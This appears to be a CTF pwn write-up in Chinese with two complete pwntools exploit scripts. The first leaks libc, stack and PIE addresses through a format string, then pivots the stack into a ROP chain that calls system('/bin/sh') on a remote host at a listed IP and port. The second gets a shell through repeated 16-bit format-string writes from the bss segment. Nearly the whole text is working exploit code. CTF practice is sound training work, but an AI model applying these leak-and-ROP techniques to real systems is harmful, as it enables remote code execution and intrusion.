shanxi

溢出的字节数不够，利用栈迁移获得足够空间来构造 ROP 链

exp如下:

from pwn import *
# Verbose pwntools logging: every send/recv is echoed, useful when a leak
# does not parse as expected.
context(log_level='debug')
# Target binary plus the libc used for symbol offsets; every absolute
# address below is derived from leaked bases, not from these files.
elf=ELF('./pwn')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
#p=process('./pwn')
# Remote endpoint as recorded in the writeup.
p=remote("60.204.130.55",10001)
# Menu option 2 is the format-string path: three positional arguments are
# printed as pointers, consumed in the same order by the three recvs below.
p.recvuntil(b'choice :\n')
payload=str(2).encode('utf-8')
p.sendline(payload)
p.recv()
p.sendline(b'%37$p%10$p%19$p')
# Each value is read as exactly 12 hex digits after "0x"; this holds for the
# 0x7f../0x55.. addresses the script expects, a shorter leak would mis-parse.
p.recvuntil(b'0x')
# %37$p minus 128: labelled as __libc_start_main (presumably a return
# address into it; 128 is the writeup's constant).
libc_start_main=int(p.recv(12),16)-128
print(hex(libc_start_main))
p.recvuntil(b'0x')
# %10$p minus 0x30: the stack address the pivot below is built around.
stack_addr=int(p.recv(12),16)-0x30
print(hex(stack_addr))
p.recvuntil(b'0x')
# %19$p: an address inside the binary's text segment (labelled main).
main_addr=int(p.recv(12),16)
print(hex(main_addr))
# PIE base: 0x12eb is the file offset the writeup uses for main_addr.
code_base = main_addr - 0x12eb
# libc base from the leaked address and the symbol's file offset.
offset=libc.symbols['__libc_start_main']
libcbase=libc_start_main-offset
print(hex(libcbase))
# NOTE: `sys` shadows the `sys` module that `from pwn import *` re-exports.
sys = libcbase + libc.symbols['system']
binsh = libcbase + next(libc.search(b'/bin/sh'))
# Gadget file offsets from the writeup, rebased onto code_base.
pop_rdi_ret=0x1433 + code_base
leave_ret = 0x127f + code_base
ret = 0x101a + code_base  # computed but not used in the payload below
# Menu option 1 is the overflow path.  As the page notes, the overflow is
# too short for the chain in place: the chain sits in the buffer and the
# saved rbp / return slot are set to (stack_addr-0x28, leave;ret) so the
# pivot lands on it.  The 8 filler bytes keep the chain's alignment;
# stack_addr-0x28 is the writeup's constant.
p.recvuntil(b'choice :\n')
p.sendline(str(1).encode('utf-8'))
payload=p64(pop_rdi_ret)+p64(binsh)+p64(sys)+b'a'*8
payload += p64(stack_addr-0x28) + p64(leave_ret)
p.recvuntil(b'Mountain\n')
#gdb.attach(p,'b read')
#pause()
p.send(payload)
p.interactive()

ez_printf

考察了在 bss 段的格式化字符串，原理不复杂，就是有点麻烦

exp如下:

from pwn import *
# Verbose pwntools logging so each round-trip is visible.
context(log_level='debug')
# Local run; the host libc supplies the symbol offsets used below.
p=process('./pwn')
elf=ELF('./pwn')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
p.recv()
# First prompt: the fixed, NUL-terminated string the binary checks for.
p.send(b'TokameinE_is_the_best_pwner\x00')
p.recv()
#gdb.attach(p,'b *$rebase(0x1130)')
#pause()
# Leak three positional arguments as pointers, '.'-separated so each one can
# be parsed with recvuntil(b'.', drop=True).
p.sendline(b'%11$p.%49$p.%8$p.')
p.recvuntil(b'0x')
# %11$p: a text address; 134 + 0x1595 is the writeup's distance to the PIE base.
base=int(p.recvuntil(b'.',drop=True),16)-134-0x1595
print("base:"+hex(base))
p.recvuntil(b'0x')
offset=libc.symbols['__libc_start_main']
print(hex(offset))
# %49$p minus 128: treated as the address of __libc_start_main.  The name
# `true` is the original's; it does not shadow a builtin (`True` does) but
# reads oddly.
true=int(p.recvuntil(b'.',drop=True),16)-128
print(hex(true))
libcbase=true-offset
print("libcbase:"+hex(libcbase))
p.recvuntil(b'0x')
# %8$p: the stack address every later write is relative to.
stack_addr=int(p.recvuntil(b'.',drop=True),16)
print("stack_addr:"+hex(stack_addr))
#p.recvuntil(b'0x')
#stack_addr_2=int(p.recvuntil(b'.',drop=True),16)
#print("stack_addr_2:"+hex(stack_addr_2))
bin_sh=next(libc.search(b'/bin/sh'))+libcbase
print("bin_sh:"+hex(bin_sh))
sys_addr=libc.symbols['system']+libcbase
print("sys_addr:"+hex(sys_addr))
# Gadget file offsets from the writeup, rebased onto the PIE base.
pop_rdi_ret=base+0x16c3
print("pop_rdi_ret:"+hex(pop_rdi_ret))
ret=base+0x101a
print("base:"+hex(ret))  # label says "base" but the value printed is ret
# The stack cells targeted below, all relative to the leaked stack_addr.
stack_1=stack_addr+0x10
stack_2=stack_addr-0x8
stack_3=stack_addr+0x8
p.recvuntil(b'say?\n')
# Write pattern for the rest of the script: each payload performs two
# 16-bit writes with `%<count>c%<idx>$hn`.  Because %c counts accumulate,
# the smaller value is always emitted first and the second count is the
# difference, so both counts stay non-negative.  From the order of writes
# it looks like slots 33 and 51 hold pointers that are first aimed at a
# stack cell, after which slots 63 and 65 (respectively) are used to write
# through them — inferred from the script, not stated on the page.
print(hex(stack_1&0xffff))
print(hex(stack_addr&0xffff))
# Round 1: point slot 51 at stack_addr and slot 33 at stack_1 (low 16 bits).
if (stack_1&0xffff)>=(stack_addr&0xffff):
    payload=b'%'+str(stack_addr&0xffff).encode('utf-8')+b'c%51$hn'
    payload+=b'%'+str((stack_1&0xffff)-(stack_addr&0xffff)).encode('utf-8')+b'c%33$hn'
else:
    payload=b'%'+str(stack_1&0xffff).encode('utf-8')+b'c%33$hn'
    payload+=b'%'+str((stack_addr&0xffff)-(stack_1&0xffff)).encode('utf-8')+b'c%51$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
# Round 2: low 16 bits of bin_sh through slot 65, of system through slot 63.
print(hex(sys_addr&0xffff))
print(hex(bin_sh&0xffff))
if (sys_addr&0xffff)>=(bin_sh&0xffff):
    payload=b'%'+str(bin_sh&0xffff).encode('utf-8')+b'c%65$hn'
    payload+=b'%'+str((sys_addr&0xffff)-(bin_sh&0xffff)).encode('utf-8')+b'c%63$hn'
else:
    payload=b'%'+str(sys_addr&0xffff).encode('utf-8')+b'c%63$hn'
    payload+=b'%'+str((bin_sh&0xffff)-(sys_addr&0xffff)).encode('utf-8')+b'c%65$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
# Round 3: advance both pointers by 2 bytes (next 16-bit half of each cell).
print(hex((stack_1+2)&0xffff))
print(hex((stack_addr+2)&0xffff))
if ((stack_1+2)&0xffff)>=((stack_addr+2)&0xffff):
    payload=b'%'+str((stack_addr+2)&0xffff).encode('utf-8')+b'c%51$hn'
    payload+=b'%'+str(((stack_1+2)&0xffff)-((stack_addr+2)&0xffff)).encode('utf-8')+b'c%33$hn'
else:
    payload=b'%'+str((stack_1+2)&0xffff).encode('utf-8')+b'c%33$hn'
    payload+=b'%'+str(((stack_addr+2)&0xffff)-((stack_1+2)&0xffff)).encode('utf-8')+b'c%51$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
# Round 4: bits 16..31 of bin_sh and system.
print(hex((sys_addr>>16)&0xffff))
print(hex((bin_sh>>16)&0xffff))
if ((sys_addr>>16)&0xffff)>=((bin_sh>>16)&0xffff):
    payload=b'%'+str((bin_sh>>16)&0xffff).encode('utf-8')+b'c%65$hn'
    payload+=b'%'+str(((sys_addr>>16)&0xffff)-((bin_sh>>16)&0xffff)).encode('utf-8')+b'c%63$hn'
else:
    payload=b'%'+str((sys_addr>>16)&0xffff).encode('utf-8')+b'c%63$hn'
    payload+=b'%'+str(((bin_sh>>16)&0xffff)-((sys_addr>>16)&0xffff)).encode('utf-8')+b'c%65$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
# Round 5: advance both pointers by 4 bytes.
print(hex((stack_1+4)&0xffff))
print(hex((stack_addr+4)&0xffff))
if ((stack_1+4)&0xffff)>=((stack_addr+4)&0xffff):
    payload=b'%'+str((stack_addr+4)&0xffff).encode('utf-8')+b'c%51$hn'
    payload+=b'%'+str(((stack_1+4)&0xffff)-((stack_addr+4)&0xffff)).encode('utf-8')+b'c%33$hn'
else:
    payload=b'%'+str((stack_1+4)&0xffff).encode('utf-8')+b'c%33$hn'
    payload+=b'%'+str(((stack_addr+4)&0xffff)-((stack_1+4)&0xffff)).encode('utf-8')+b'c%51$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
# Round 6: bits 32..47.  One count is reused for both slots: both values
# are libcbase + offset, so their upper halves match as long as neither
# offset crosses a 2^32 boundary (assumed, not checked).
print(hex((sys_addr>>32)&0xffff))
print(hex((bin_sh>>32)&0xffff))
payload=b'%'+str((bin_sh>>32)&0xffff).encode('utf-8')+b'c%65$hn'+b'%63$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
# Remaining rounds: re-aim slot 33 at stack_2, then at stack_3, and write
# only the low 16 bits of pop_rdi_ret / ret through slot 63.  This relies on
# the upper bits of those cells already matching the binary's mapping,
# which the script does not verify.
payload=b'%'+str(stack_2&0xffff).encode('utf-8')+b'c%33$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
payload=b'%'+str(pop_rdi_ret&0xffff).encode('utf-8')+b'c%63$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
payload=b'%'+str(stack_3&0xffff).encode('utf-8')+b'c%33$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
payload=b'%'+str(ret&0xffff).encode('utf-8')+b'c%63$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
# The stack_3 / ret pair is sent a second time in the original; the repeat
# is kept as-is (it rewrites the same value).
payload=b'%'+str(stack_3&0xffff).encode('utf-8')+b'c%33$hn'
p.sendline(payload)
p.recvuntil(b'say?\n')
payload=b'%'+str(ret&0xffff).encode('utf-8')+b'c%63$hn'
p.sendline(payload)
p.recv()
p.interactive()